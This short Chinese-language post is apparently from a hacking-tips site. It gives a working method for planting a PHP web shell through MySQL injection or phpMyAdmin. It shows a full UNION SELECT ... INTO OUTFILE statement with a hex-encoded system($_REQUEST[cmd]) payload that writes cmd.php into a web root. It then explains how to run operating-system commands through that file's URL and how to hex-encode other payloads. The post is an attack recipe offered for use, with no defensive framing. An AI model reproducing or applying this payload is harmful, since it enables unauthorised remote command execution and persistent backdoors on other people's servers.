通過mysql 的語句生成后門木馬的方法!
select * from `vbb_strikes` where 1 union select 2,3,0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
通過mysql 的注入或者在 phpmyadmin 里運行以上語句,則會c:/inetpub/wwwroot/下生成 cmd.php 文件,內容為原來的 vbb_strikes 內容,后面緊跟著:
2 3 <?php system($_request[cmd]);?>
再通過 http://www.xxx.com/cmd.php?cmd=dir c:/ 就可以執行系統dos命令!
哪串0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e是什么東西?
就是<?php system($_request[cmd]);?>的十六進制編碼了,如果不用這種方法,有不同的sql版本會出現其它的編碼:如%xx之類的,哪這個后門就不能執行的了!如果你有其它語名要弄,可以到ultraedit里輸入,再按[ctrl+h]鍵,將里面的十六進制連在一起就可以了!
新聞熱點
疑難解答